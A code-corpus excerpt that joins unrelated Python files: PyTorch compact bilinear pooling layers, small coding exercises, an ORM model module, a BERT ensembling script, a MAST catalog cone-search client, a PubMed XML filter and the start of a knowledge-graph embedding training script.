re_prod.dim()), 1, signal_sizes=(output_size,))
return re
@staticmethod
def backward(ctx, grad_output):
h1, s1, h2, s2, x, y = ctx.saved_tensors
# Recompute part of the forward pass to get the input to the complex product
# Compute the count sketch of each input
px = CountSketchFn_forward(
h1, s1, ctx.output_size, x, ctx.force_cpu_scatter_add)
py = CountSketchFn_forward(
h2, s2, ctx.output_size, y, ctx.force_cpu_scatter_add)
# Then convert the output to Fourier domain
grad_output = grad_output.contiguous()
grad_prod = torch.rfft(grad_output, 1)
grad_re_prod = grad_prod.select(-1, 0)
grad_im_prod = grad_prod.select(-1, 1)
# Compute the gradient of x first then y
# Gradient of x
# Recompute fy
fy = torch.rfft(py, 1)
re_fy = fy.select(-1, 0)
im_fy = fy.select(-1, 1)
del py
# Compute the gradient of fx, then back to temporal space
grad_re_fx = torch.addcmul(
grad_re_prod * re_fy, 1, grad_im_prod, im_fy)
grad_im_fx = torch.addcmul(
grad_im_prod * re_fy, -1, grad_re_prod, im_fy)
grad_fx = torch.irfft(torch.stack(
(grad_re_fx, grad_im_fx), grad_re_fx.dim()), 1, signal_sizes=(ctx.output_size,))
# Finally compute the gradient of x
grad_x = CountSketchFn_backward(h1, s1, ctx.x_size, grad_fx)
del re_fy, im_fy, grad_re_fx, grad_im_fx, grad_fx
# Gradient of y
# Recompute fx
fx = torch.rfft(px, 1)
re_fx = fx.select(-1, 0)
im_fx = fx.select(-1, 1)
del px
# Compute the gradient of fy, then back to temporal space
grad_re_fy = torch.addcmul(
grad_re_prod * re_fx, 1, grad_im_prod, im_fx)
grad_im_fy = torch.addcmul(
grad_im_prod * re_fx, -1, grad_re_prod, im_fx)
grad_fy = torch.irfft(torch.stack(
(grad_re_fy, grad_im_fy), grad_re_fy.dim()), 1, signal_sizes=(ctx.output_size,))
# Finally compute the gradient of y
grad_y = CountSketchFn_backward(h2, s2, ctx.y_size, grad_fy)
del re_fx, im_fx, grad_re_fy, grad_im_fy, grad_fy
return None, None, None, None, None, grad_x, grad_y, None
class CompactBilinearPoolingFnFourStream(Function):
@staticmethod
def forward(ctx, h1, s1, h2, s2, h3, s3, h4, s4, output_size, a, b, c, d, force_cpu_scatter_add=False):
ctx.save_for_backward(h1, s1, h2, s2, h3, s3, h4, s4, a, b, c, d)
ctx.a_size = tuple(a.size())
ctx.b_size = tuple(b.size())
ctx.c_size = tuple(c.size())
ctx.d_size = tuple(d.size())
ctx.force_cpu_scatter_add = force_cpu_scatter_add
ctx.output_size = output_size
# Compute the count sketch of each input
pa = CountSketchFn_forward(
h1, s1, output_size, a, force_cpu_scatter_add)
fa = torch.rfft(pa, 1)
re_fa = fa.select(-1, 0)
im_fa = fa.select(-1, 1)
del pa
pb = CountSketchFn_forward(
h2, s2, output_size, b, force_cpu_scatter_add)
fb = torch.rfft(pb, 1)
re_fb = fb.select(-1, 0)
im_fb = fb.select(-1, 1)
del pb
pc = CountSketchFn_forward(
h3, s3, output_size, c, force_cpu_scatter_add)
fc = torch.rfft(pc, 1)
re_fc = fc.select(-1, 0)
im_fc = fc.select(-1, 1)
del pc
pd = CountSketchFn_forward(
h4, s4, output_size, d, force_cpu_scatter_add)
fd = torch.rfft(pd, 1)
re_fd = fd.select(-1, 0)
im_fd = fd.select(-1, 1)
del pd
# Convolution of the two sketch using an FFT.
# Compute the FFT of each sketch
# Complex multiplication
re_prod, im_prod = ComplexMultiplyFourStream_forward(
re_fa, im_fa, re_fb, im_fb, re_fc, im_fc, re_fd, im_fd)
# Back to real domain
# The imaginary part should be zero's
re = torch.irfft(torch.stack((re_prod, im_prod),
re_prod.dim()), 1, signal_sizes=(output_size,))
return re
@staticmethod
def backward(ctx, grad_output):
h1, s1, h2, s2, h3, s3, h4, s4, a, b, c, d = ctx.saved_tensors
# Recompute part of the forward pass to get the input to the complex product
# Compute the count sketch of each input
pa = CountSketchFn_forward(
h1, s1, ctx.output_size, a, ctx.force_cpu_scatter_add)
pb = CountSketchFn_forward(
h2, s2, ctx.output_size, b, ctx.force_cpu_scatter_add)
pc = CountSketchFn_forward(
h2, s2, ctx.output_size, c, ctx.force_cpu_scatter_add)
pd = CountSketchFn_forward(
h2, s2, ctx.output_size, d, ctx.force_cpu_scatter_add)
# Then convert the output to Fourier domain
grad_output = grad_output.contiguous()
grad_prod = torch.rfft(grad_output, 1)
grad_re_prod = grad_prod.select(-1, 0)
grad_im_prod = grad_prod.select(-1, 1)
# Compute the gradient of x first then y
# Gradient of x
# Recompute fy
fa = torch.rfft(pa, 1)
re_fa = fa.select(-1, 0)
im_fa = fa.select(-1, 1)
del pa
fb = torch.rfft(pb, 1)
re_fb = fb.select(-1, 0)
im_fb = fb.select(-1, 1)
del pb
fc = torch.rfft(pc, 1)
re_fc = fc.select(-1, 0)
im_fc = fc.select(-1, 1)
del pc
fd = torch.rfft(pd, 1)
re_fd = fd.select(-1, 0)
im_fd = fd.select(-1, 1)
del pd
grad_re_fa, grad_im_fa, grad_re_fb, grad_im_fb, grad_re_fc, grad_im_fc, grad_re_fd, grad_im_fd = \
ComplexMultiplyFourStream_backward(
re_fa, im_fa, re_fb, im_fb, re_fc, im_fc, re_fd, im_fd, grad_re_prod, grad_im_prod)
# Compute the gradient of fx, then back to temporal space
grad_fa = torch.irfft(torch.stack(
(grad_re_fa, grad_im_fa), grad_re_fa.dim()), 1, signal_sizes=(ctx.output_size,))
grad_fb = torch.irfft(torch.stack(
(grad_re_fb, grad_im_fb), grad_re_fb.dim()), 1, signal_sizes=(ctx.output_size,))
grad_fc = torch.irfft(torch.stack(
(grad_re_fc, grad_im_fc), grad_re_fc.dim()), 1, signal_sizes=(ctx.output_size,))
grad_fd = torch.irfft(torch.stack(
(grad_re_fd, grad_im_fd), grad_re_fd.dim()), 1, signal_sizes=(ctx.output_size,))
# Finally compute the gradient of x
grad_a = CountSketchFn_backward(h1, s1, ctx.a_size, grad_fa)
grad_b = CountSketchFn_backward(h2, s2, ctx.b_size, grad_fb)
grad_c = CountSketchFn_backward(h3, s3, ctx.c_size, grad_fc)
grad_d = CountSketchFn_backward(h4, s4, ctx.d_size, grad_fd)
del re_fa, im_fa, grad_re_fa, grad_im_fa, grad_fa, \
re_fb, im_fb, grad_re_fb, grad_im_fb, grad_fb, \
re_fc, im_fc, grad_re_fc, grad_im_fc, grad_fc, \
re_fd, im_fd, grad_re_fd, grad_im_fd, grad_fd
return None, None, None, None, None, None, None, None, None, grad_a, grad_b, grad_c, grad_d, None
class CompactBilinearPooling(nn.Module):
r"""Compute the compact bilinear pooling between two input array x and y
.. math::
out = \Psi (x,h_1,s_1) \ast \Psi (y,h_2,s_2)
Args:
input_size1 (int): Number of channels in the first input array
input_size2 (int): Number of channels in the second input array
output_size (int): Number of channels in the output array
h1 (array, optional): Optional array of size input_size of indices in the range [0,output_size]
s1 (array, optional): Optional array of size input_size of -1 and 1.
h2 (array, optional): Optional array of size input_size of indices in the range [0,output_size]
s2 (array, optional): Optional array of size input_size of -1 and 1.
force_cpu_scatter_add (boolean, optional): Force the scatter_add operation to run on CPU for testing purposes
.. note::
If h1, s1, s2, h2 are None, they will be automatically be generated using LongTensor.random_.
Shape:
- Input 1: (...,input_size1)
- Input 2: (...,input_size2)
- Output: (...,output_size)
References:
<NAME> et al. "Compact Bilinear Pooling" in Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (2016).
<NAME> et al. "Multimodal Compact Bilinear Pooling for Visual Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
"""
def __init__(self, input1_size, input2_size, output_size, h1=None, s1=None, h2=None, s2=None, force_cpu_scatter_add=False):
super(CompactBilinearPooling, self).__init__()
self.add_module('sketch1', CountSketch(
input1_size, output_size, h1, s1))
self.add_module('sketch2', CountSketch(
input2_size, output_size, h2, s2))
self.output_size = output_size
self.force_cpu_scatter_add = force_cpu_scatter_add
def forward(self, x, y=None):
if y is None:
y = x
return CompactBilinearPoolingFn.apply(self.sketch1.h, self.sketch1.s, self.sketch2.h, self.sketch2.s, self.output_size, x, y, self.force_cpu_scatter_add)
class CompactBilinearPoolingFourStream(nn.Module):
r"""Compute the compact bilinear pooling between two input array x and y
.. math::
out = \Psi (x,h_1,s_1) \ast \Psi (y,h_2,s_2)
Args:
input_size1 (int): Number of channels in the first input array
input_size2 (int): Number of channels in the second input array
output_size (int): Number of channels in the output array
h1 (array, optional): Optional array of size input_size of indices in the range [0,output_size]
s1 (array, optional): Optional array of size input_size of -1 and 1.
h2 (array, optional): Optional array of size input_size of indices in the range [0,output_size]
s2 (array, optional): Optional array of size input_size of -1 and 1.
force_cpu_scatter_add (boolean, optional): Force the scatter_add operation to run on CPU for testing purposes
.. note::
If h1, s1, s2, h2 are None, they will be automatically be generated using LongTensor.random_.
Shape:
- Input 1: (...,input_size1)
- Input 2: (...,input_size2)
- Output: (...,output_size)
References:
<NAME> et al. "Compact Bilinear Pooling" in Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (2016).
<NAME>ui et al. "Multimodal Compact Bilinear Pooling for Visual Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
"""
def __init__(self, input1_size, input2_size, input3_size, input4_size, output_size,
h1=None, s1=None, h2=None, s2=None, h3=None, s3=None, h4=None, s4=None, force_cpu_scatter_add=False):
super(CompactBilinearPoolingFourStream, self).__init__()
self.add_module('sketch1', CountSketch(
input1_size, output_size, h1, s1))
self.add_module('sketch2', CountSketch(
input2_size, output_size, h2, s2))
self.add_module('sketch3', CountSketch(
input3_size, output_size, h3, s3))
self.add_module('sketch4', CountSketch(
input4_size, output_size, h4, s4))
self.output_size = output_size
self.force_cpu_scatter_add = force_cpu_scatter_add
def forward(self, a, b, c, d):
return CompactBilinearPoolingFnFourStream.apply(self.sketch1.h, self.sketch1.s, self.sketch2.h, self.sketch2.s,
self.sketch3.h, self.sketch3.s, self.sketch4.h, self.sketch4.s,
self.output_size, a, b, c, d, self.force_cpu_scatter_add)
| StarcoderdataPython |
8129085 | <gh_stars>0
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#522. Longest Uncommon Subsequence II
#Given a list of strings, you need to find the longest uncommon subsequence among them. The longest uncommon subsequence is defined as the longest subsequence of one of these strings and this subsequence should not be any subsequence of the other strings.
#A subsequence is a sequence that can be derived from one sequence by deleting some characters without changing the order of the remaining elements. Trivially, any string is a subsequence of itself and an empty string is a subsequence of any string.
#The input will be a list of strings, and the output needs to be the length of the longest uncommon subsequence. If the longest uncommon subsequence doesn't exist, return -1.
#Example 1:
#Input: "aba", "cdc", "eae"
#Output: 3
#Note:
#All the given strings' lengths will not exceed 10.
#The length of the given list will be in the range of [2, 50].
#class Solution(object):
# def findLUSlength(self, strs):
# """
# :type strs: List[str]
# :rtype: int
# """
# Time Is Money | StarcoderdataPython |
3524229 | <filename>Python/Fundamentals/Dictionaries(lab-exercises)/Exercises/Force Book.py
forceBook={}
while True:
command=input()
if command!="Lumpawaroo":
if "|" in command:
command=command.split(" | ")
isThereSuchUser=False
for j in forceBook:
for k in range(0,len(forceBook[j])):
if forceBook[j][k]==command[1]:
isThereSuchUser=True
break
if isThereSuchUser == True:
break
if isThereSuchUser==True:
continue
else:
if command[0] in forceBook:
forceBook[command[0]].append(command[1])
else:
forceBook[command[0]]=[command[1]]
elif "->" in command:
command=command.split(" -> ")
isThereSuchUser=False
for j in forceBook:
for k in range(0,len(forceBook[j])):
if forceBook[j][k]==command[0]:
isThereSuchUser=True
del forceBook[j][k]
break
if isThereSuchUser==True:
break
if not command[1] in forceBook:
forceBook[command[1]]=[command[0]]
else:
forceBook[command[1]].append(command[0])
print(f"{command[0]} joins the {command[1]} side!")
else:
for j in forceBook:
if len(forceBook[j])!=0:
print(f"Side: {j}, Members: {len(forceBook[j])}")
for k in range(0,len(forceBook[j])):
print(f"! {forceBook[j][k]}")
else:
continue
break
| StarcoderdataPython |
5121084 | <gh_stars>1-10
from typing import NamedTuple, Mapping, Dict, Any, List, Optional
from resync.fields import Field, ForeignKeyField, ReverseForeignKeyField
from resync.manager import Manager
from resync.utils import RegistryPatternMetaclass
from resync.diff import DiffObject
ModelMeta = NamedTuple(
'Meta',
[('table', str), ('fields', Mapping['str', Field]), ('reverse_relations', Mapping[str, ReverseForeignKeyField])]
)
class DocumentBase(type):
def __new__(mcs, name, bases, attrs):
fields = {}
for base in bases:
fields.update(base._meta.fields)
non_field_attrs = {}
for key, value in attrs.items():
if isinstance(value, Field):
value.name = key
fields[key] = value
else:
non_field_attrs[key] = value
new_class = super(DocumentBase, mcs).__new__(mcs, name, bases, non_field_attrs)
new_class._meta = ModelMeta(None, fields, {})
return new_class
class ModelBase(DocumentBase, RegistryPatternMetaclass):
def __new__(mcs, name, bases, attrs):
table_name = attrs.pop('table', name.lower())
foreign_key_fields = {}
for key, value in attrs.items():
if isinstance(value, ForeignKeyField):
foreign_key_fields[key] = value
new_class = super(ModelBase, mcs).__new__(mcs, name, bases, attrs)
new_class._meta = ModelMeta(table_name, new_class._meta.fields, {})
for foreign_key_field_name, field in foreign_key_fields.items():
related_model = field.model
reverse_relation_name = field.related_name or name.lower() + '_set'
related_model._meta.reverse_relations[reverse_relation_name] = ReverseForeignKeyField(new_class, foreign_key_field_name)
return new_class
@property
def table(cls):
return cls._meta.table
class NestedDocument(metaclass=DocumentBase):
def __init__(self, **kwargs):
fields = frozenset(self._meta.fields.keys())
for field_name, value in kwargs.items():
if field_name not in fields:
raise AttributeError(
'{} received unexpected keyword argument {}.'.format(self.__class__.__name__, field_name))
setattr(self, field_name, value)
for field_name in fields.difference(frozenset(kwargs.keys())):
setattr(self, field_name, self._meta.fields[field_name].default)
def to_db(self) -> Dict[str, Any]:
"""
Converts itself into a plain Python dictionary of values serialized into a form suitable for the database.
This method is called by parent/container models when they are serialized.
"""
field_data = self._get_field_data()
return self.serialize_fields(field_data)
@classmethod
def from_db(cls, data_dict: Mapping[str, Any]):
"""
Deserializes the data from its db representation into Python values and returns a
"""
transformed_data = {}
for field_name, field in cls._meta.fields.items():
value = data_dict.get(field_name, field.default)
transformed_data[field_name] = field.from_db(value)
return cls(**transformed_data)
@classmethod
def serialize_fields(cls, data_dict: Mapping[str, Any]) -> Dict[str, Any]:
"""
Converts a dictionary with the Python values of this model's fields into their db forms. Throws KeyError if
any keys in the dictionary are not fields on this model. Return value doesn't include fields missing from
the input dictionary.
"""
transformed_data = {}
for field_name, value in data_dict.items():
field = cls._meta.fields[field_name]
transformed_data[field_name] = field.to_db(value)
return transformed_data
def _get_field_data(self):
"""
Get the instance's field data as a plain Python dictionary.
"""
return {field_name: getattr(self, field_name) for field_name in self._meta.fields.keys()}
class Model(NestedDocument, metaclass=ModelBase):
class DoesNotExist(Exception):
pass
def __init__(self, **kwargs):
super(Model, self).__init__(**kwargs)
if self.id is not None:
for related_name, field in self._meta.reverse_relations.items():
setattr(self, related_name, field.get_queryset(self.id))
async def save(self) -> Optional[List[DiffObject]]:
field_data = self._get_field_data()
create = self.id is None
if create:
field_data.pop('id')
new_obj = await self.objects.create(**field_data)
self.id = new_obj.id
changes = None
else:
changes = await self.objects.update(self, **field_data)
return changes
def to_db(self):
serialized_data = super(Model, self).to_db()
if self.id is None:
serialized_data.pop('id')
return serialized_data
def setup():
for subclass in RegistryPatternMetaclass.REGISTRY:
if subclass is Model:
continue
if not hasattr(subclass, 'objects'):
subclass.objects = Manager()
subclass.objects.attach_model(subclass)
| StarcoderdataPython |
3558770 | import argparse
from glob import glob
import numpy as np
import pandas as pd
def parse_arguments(parser):
parser.add_argument('--data_dir', type=str, default=None)
parser.add_argument('--output_dir', type=str, default=None)
parser.add_argument('--mode', type=str, default='test')
parser.add_argument('--test_file', type=str, default='test.tsv')
parser.add_argument('--text_only', type=bool, default=True)
parser.add_argument('--train_blender', type=bool, default=True)
args = parser.parse_args()
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser()
args = parse_arguments(parser)
assert (args.data_dir)
# Import the real test data
test_df = pd.read_csv(args.data_dir + '/test.csv')
# Importing the event code dictionary to convert the BERT indices
code_df = pd.read_csv(args.data_dir + '/code_dict.csv')
code_dict = dict(zip(code_df.value, code_df.event_code))
# Importing the scores from the 4 BERT runs
if args.mode == 'validate':
run_folder = 'val_runs'
elif args.mode == 'test':
run_folder = 'test_runs'
prob_list = []
for fn in sorted(glob(args.output_dir + '/[0-9]')):
print(fn)
run_probs = np.array(
pd.read_csv(fn + '/test_results.tsv', sep='\t', header=None))
test_df['event'] = [
code_dict[code] for code in np.argmax(run_probs, axis=1)
]
test_df.to_csv(fn + '/solution.csv', header=True, index=False)
prob_list.append(run_probs)
assert (prob_list)
prob_list = np.array(prob_list)
# Grouping the probabilities for regular averaging
avg_probs = np.mean(prob_list, axis=0)
print(avg_probs)
assert (np.allclose(np.sum(avg_probs, axis=1), np.ones(test_df.shape[0])))
avg_guesses = np.array(
[code_dict[code] for code in np.argmax(avg_probs, axis=1)])
# Grouping the probabilities for blending
wide_probs = np.concatenate(prob_list, axis=1)
# Producing guesses when only the input text is available
if args.text_only:
# Loading the blender model
# lgr = joblib.load(args.data_dir + 'blender.joblib')
# blend_guesses = lgr.predict(wide_probs)
# blend_probs = np.max(lgr.predict_proba(wide_probs), axis=1)
# print(blend_probs[0])
# Exporting the guesses to disk
ids = pd.read_csv(args.data_dir + '/' + args.test_file, sep='\t')['id']
guess_df = pd.DataFrame(
pd.concat([
ids,
pd.Series(avg_guesses),
pd.Series(np.max(avg_probs, axis=1))
],
axis=1))
guess_df.columns = ['id', 'avg_guess', 'avg_prob']
guess_df.to_csv(args.output_dir + '/guesses.csv',
header=True,
index=False)
test_df['event'] = avg_guesses
test_df.to_csv(args.output_dir + '/solution.csv',
header=True,
index=False)
# Producing guesses and scores when the labels are also available
else:
# Getting the guesses from the blending model
if args.train_blender:
targets = pd.read_csv(args.data_dir + '/' +
args.test_file)['event']
lgr = LogisticRegression()
lgr.fit(wide_probs, targets)
joblib.dump(lgr, args.data_dir + 'blender.joblib')
else:
lgr = joblib.load(args.data_dir + 'blender.joblib')
blend_guesses = lgr.predict(wide_probs)
# Importing the test records and getting the various scores
test_records = pd.read_csv(args.data_dir + args.test_file)
targets = np.array(test_records.event)
avg_f1 = f1_score(targets, avg_guesses, average='weighted')
blend_f1 = f1_score(targets, blend_guesses, average='weighted')
print('')
print('Weighted macro f1 on the test set is ' + str(avg_f1) +
' with averaging and ' + str(blend_f1) + ' with blending.')
# Writing results to disk
results = pd.DataFrame(
pd.concat([
test_records.id, test_records.text, test_records.event,
pd.Series(avg_guesses),
pd.Series(blend_guesses)
],
axis=1))
results.columns = ['id', 'text', 'event', 'avg_guess', 'blend_guess']
results.to_csv(args.data_dir + 'results.csv', header=True, index=False)
| StarcoderdataPython |
4866049 | <filename>app/main/views.py
from flask import Blueprint, render_template
from app.models import EditableHTML, UsefulLink
main = Blueprint('main', __name__)
@main.route('/')
def index():
useful_links = UsefulLink.query.all()
return render_template('main/index.html',
useful_links=useful_links
)
@main.route('/about')
def about():
editable_html_obj = EditableHTML.get_editable_html('about')
return render_template(
'main/about.html',
editable_html_obj=editable_html_obj
)
| StarcoderdataPython |
176169 | from setuptools import setup
setup(
name='padacioso',
version='0.1.1',
packages=['padacioso'],
url='https://github.com/OpenJarbas/padacioso',
license='apache-2.0',
author='jarbasai',
author_email='<EMAIL>',
install_requires=["simplematch"],
description='dead simple intent parser'
)
| StarcoderdataPython |
6633769 | <reponame>mmfausnaugh/tica<filename>wcs_build/mast_filter_conesearch.py<gh_stars>0
import numpy as np
import sys
import json
import time
try: # Python 3.x
from urllib.parse import quote as urlencode
from urllib.request import urlretrieve
from urllib.parse import urlencode as dict_urlencode
from urllib.request import urlopen
except ImportError: # Python 2.x
from urllib import pathname2url as urlencode
from urllib import urlretrieve
from urllib import urlencode as dict_urlencode
from urllib import urlopen
try: # Python 3.x
import http.client as httplib
except ImportError: # Python 2.x
import httplib
## [Mast Query]
def mastQuery(request):
server='mast.stsci.edu'
# Grab Python Version
version = ".".join(map(str, sys.version_info[:3]))
# Create Http Header Variables
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
"User-agent":"python-requests/"+version}
# Encoding the request as a json string
requestString = json.dumps(request)
requestString = urlencode(requestString)
# opening the https connection
conn = httplib.HTTPSConnection(server)
# Making the query
conn.request("POST", "/api/v0/invoke", "request="+requestString, headers)
# Getting the response
resp = conn.getresponse()
head = resp.getheaders()
content = resp.read().decode('utf-8')
# Close the https connection
conn.close()
return head,content
## [Mast Query]
def mast_filter_conesearch(starRa, starDec, radius, minTmag, maxTmag):
# Do a MAST cone search around the ra and dec to get the nearby stars
startTime = time.time()
request = {'service':'Mast.Catalogs.Filtered.Tic.Position.Rows', \
'params':{'columns':'ID,ra,dec,Tmag,Kmag,GAIAmag,pmRA,pmDEC', \
'filters':[ \
{'paramName':'Tmag',\
'values':[{'min':minTmag, 'max':maxTmag}]},\
{'paramName':'pmRA',\
'values':[{'min':-100.0, 'max':100.0}]}, \
{'paramName':'pmDEC',\
'values':[{'min':-100.0, 'max':100.0}]}], \
'ra':'{:10.5f}'.format(starRa),\
'dec':'{:10.5f}'.format(starDec),\
'radius':'{:10.7f}'.format(radius/3600.0) \
}, \
'format':'json', 'removenullcolumns':False}
while True:
headers, outString = mastQuery(request)
try:
outObject = json.loads(outString)
if outObject['status'] != 'EXECUTING':
break
except:
print('Problem at MAST. Resting and trying again')
time.sleep(10)
if time.time() - startTime > 30:
print('Working...')
startTime = time.time()
time.sleep(5)
try:
ticList = np.array([x['ID'] for x in outObject['data']], dtype=np.int64)
ticRas = np.array([x['ra'] for x in outObject['data']], dtype=np.float)
ticDecs = np.array([x['dec'] for x in outObject['data']], dtype=np.float)
ticTmags = np.array([x['Tmag'] for x in outObject['data']], dtype=np.float)
ticKmags = np.array([x['Kmag'] for x in outObject['data']], dtype=np.float)
ticGmags = np.array([x['GAIAmag'] for x in outObject['data']], dtype=np.float)
ticpmRA = np.array([x['pmRA'] for x in outObject['data']], dtype=np.float)
ticpmDec = np.array([x['pmDEC'] for x in outObject['data']], dtype=np.float)
except:
# Try rerunning search
while True:
headers, outString = mastQuery(request)
try:
outObject = json.loads(outString)
if outObject['status'] != 'EXECUTING':
break
except:
print('Problem at MAST. Resting and trying again')
time.sleep(20)
if time.time() - startTime > 30:
print('Working...')
startTime = time.time()
time.sleep(5)
try:
ticList = np.array([x['ID'] for x in outObject['data']], dtype=np.int64)
ticRas = np.array([x['ra'] for x in outObject['data']], dtype=np.float)
ticDecs = np.array([x['dec'] for x in outObject['data']], dtype=np.float)
ticTmags = np.array([x['Tmag'] for x in outObject['data']], dtype=np.float)
ticKmags = np.array([x['Kmag'] for x in outObject['data']], dtype=np.float)
ticGmags = np.array([x['GAIAmag'] for x in outObject['data']], dtype=np.float)
ticpmRA = np.array([x['pmRA'] for x in outObject['data']], dtype=np.float)
ticpmDec = np.array([x['pmDEC'] for x in outObject['data']], dtype=np.float)
except:
print('Tried MAST cone search twice and failed. Exiting')
exit()
return ticList, ticRas, ticDecs, ticTmags, ticKmags, ticGmags, ticpmRA, ticpmDec
| StarcoderdataPython |
3313450 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-10-03 16:51
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
# Django 2.0 requires this for renaming models in SQLite
# https://stackoverflow.com/questions/48549068/django-db-utils-notsupportederror-in-sqlite-why-not-supported-in-sqlite
atomic = False
dependencies = [
('entrance', '0048_userpaticipatedinschoolentrancestep'),
]
operations = [
migrations.RenameModel(
old_name='UserPaticipatedInSchoolEntranceStep',
new_name='UserParticipatedInSchoolEntranceStep',
),
]
| StarcoderdataPython |
8011587 | <gh_stars>10-100
"""
Extract a set of doc ids from the pubmed xml files.
"""
import argparse
import glob
import gzip
import multiprocessing
import os
from functools import partial
from multiprocessing import Pool
import sys
from lxml import etree
def parse_pubmeds(pmids: list, file: str) -> str:
"""
:param pmids:
:param file:
:return:
"""
data = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE PubmedArticleSet SYSTEM "http://dtd.nlm.nih.gov/ncbi/pubmed/out/pubmed_170101.dtd">
<PubmedArticleSet>
{}
</PubmedArticleSet>
"""
print(file)
decompressed_file = gzip.GzipFile(file, mode='rb')
tree = etree.parse(decompressed_file)
root = tree.getroot()
for node in root.findall('PubmedArticle'):
pmid = node.find('MedlineCitation').find('PMID').text
if pmid in pmids:
print(pmid)
file_data = data.format(
etree.tostring(node, encoding='unicode', method='xml', pretty_print=True))
with open('/datadrive2/pubmed_filter/{}.xml'.format(pmid), 'w') as f:
f.write(file_data)
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('--pmids', help='Location of pmids file.',
type=argparse.FileType('r'), default=sys.stdin)
argparser.add_argument('--pubmed', help='Location of pubmed gzip files.',
type=str, required=True)
args = argparser.parse_args()
parse_partial = partial(parse_pubmeds, [x.strip() for x in args.pmids.readlines()])
print(list(glob.glob(os.path.join(args.pubmed, '*.xml.gz'))))
p = Pool(multiprocessing.cpu_count() - 1 or 1)
p.map(parse_partial, list(glob.glob(os.path.join(args.pubmed, '*.xml.gz'))))
p.close()
p.join()
| StarcoderdataPython |
9614570 | <reponame>HW-AARC-CLUB/DensE
#!/usr/bin/python3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import logging
import os
import random
import numpy as np
import torch
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
from model import DensEModel
from dataloader import TrainDataset
from dataloader import BidirectionalOneShotIterator
def parse_args(args=None):
parser = argparse.ArgumentParser(
description='Training and Testing Knowledge Graph Embedding Models',
usage='train.py [<args>] [-h | --help]'
)
parser.add_argument('--cuda', action='store_true', help='use GPU')
parser.add_argument('--do_train', action='store_true')
parser.add_argument('--do_valid', action='store_true')
parser.add_argument('--do_test', action='store_true')
parser.add_argument('--evaluate_train', action='store_true', help='Evaluate on training data')
parser.add_argument('--countries', action='store_true', help='Use Countries S1/S2/S3 datasets')
parser.add_argument('--regions', type=int, nargs='+', default=None,
help='Region Id for Countries S1/S2/S3 datasets, DO NOT MANUALLY SET')
parser.add_argument('--data_path', type=str, default=None)
parser.add_argument('--model', default='TransE', type=str)
parser.add_argument('-me', '--entity_embedding_has_mod', action='store_true')
parser.add_argument('-mr', '--relation_embedding_has_mod', action='store_true')
parser.add_argument('-n', '--negative_sample_size', default=128, type=int)
parser.add_argument('-d', '--hidden_dim', default=500, type=int)
parser.add_argument('-g', '--gamma', default=12.0, type=float)
parser.add_argument('-adv', '--negative_adversarial_sampling', action='store_true')
parser.add_argument('-a', '--adversarial_temperature', default=1.0, type=float)
parser.add_argument('-b', '--batch_size', default=1024, type=int)
parser.add_argument('-r', '--regularization', default=0.0, type=float)
parser.add_argument('--test_batch_size', default=4, type=int, help='valid/test batch size')
parser.add_argument('--uni_weight', action='store_true',
help='Otherwise use subsampling weighting like in word2vec')
parser.add_argument('-lr', '--learning_rate', default=0.0001, type=float)
parser.add_argument('-cpu', '--cpu_num', default=40, type=int)
parser.add_argument('-init', '--init_checkpoint', default=None, type=str)
parser.add_argument('-save', '--save_path', default=None, type=str)
parser.add_argument('--max_steps', default=1000000, type=int)
parser.add_argument('--warm_up_steps', default=None, type=int)
parser.add_argument('--save_checkpoint_steps', default=1000, type=int)
parser.add_argument('--valid_steps', default=1000, type=int)
parser.add_argument('--log_steps', default=500, type=int, help='train log every xx steps')
parser.add_argument('--test_log_steps', default=1000, type=int, help='valid/test log every xx steps')
parser.add_argument('--nentity', type=int, default=0, help='DO NOT MANUALLY SET')
parser.add_argument('--nrelation', type=int, default=0, help='DO NOT MANUALLY SET')
parser.add_argument('--study_valid_id', type=int, default=0, help='relation_id_to_study in valid')
return parser.parse_args(args)
def override_config(args):
'''
Override model and data configuration
'''
with open(os.path.join(args.init_checkpoint, 'config.json'), 'r') as fjson:
argparse_dict = json.load(fjson)
args.countries = argparse_dict['countries']
if args.data_path is None:
args.data_path = argparse_dict['data_path']
args.model = argparse_dict['model']
args.entity_embedding_has_mod = argparse_dict['entity_embedding_has_mod']
args.relation_embedding_has_mod = argparse_dict['relation_embedding_has_mod']
args.hidden_dim = argparse_dict['hidden_dim']
args.test_batch_size = argparse_dict['test_batch_size']
args.gamma = argparse_dict['gamma']
def save_model(model, optimizer, save_variable_list, args):
'''
Save the parameters of the model and the optimizer,
as well as some other variables such as step and learning_rate
'''
argparse_dict = vars(args)
with open(os.path.join(args.save_path, 'config.json'), 'w') as fjson:
json.dump(argparse_dict, fjson)
torch.save({
**save_variable_list,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict()},
os.path.join(args.save_path, 'checkpoint')
)
entity_x_embedding = model.entity_x.weight.data.detach().cpu().numpy()
entity_y_embedding = model.entity_y.weight.data.detach().cpu().numpy()
entity_z_embedding = model.entity_z.weight.data.detach().cpu().numpy()
np.save(os.path.join(args.save_path, 'entity_x'), entity_x_embedding)
np.save(os.path.join(args.save_path, 'entity_y'), entity_y_embedding)
np.save(os.path.join(args.save_path, 'entity_z'), entity_z_embedding)
relation_w_embedding = model.relation_w.weight.data.detach().cpu().numpy()
relation_x_embedding = model.relation_x.weight.data.detach().cpu().numpy()
relation_y_embedding = model.relation_y.weight.data.detach().cpu().numpy()
relation_z_embedding = model.relation_z.weight.data.detach().cpu().numpy()
np.save(os.path.join(args.save_path, 'relation_w'), relation_w_embedding)
np.save(os.path.join(args.save_path, 'relation_x'), relation_x_embedding)
np.save(os.path.join(args.save_path, 'relation_y'), relation_y_embedding)
np.save(os.path.join(args.save_path, 'relation_z'), relation_z_embedding)
def read_triple(file_path, entity2id, relation2id):
'''
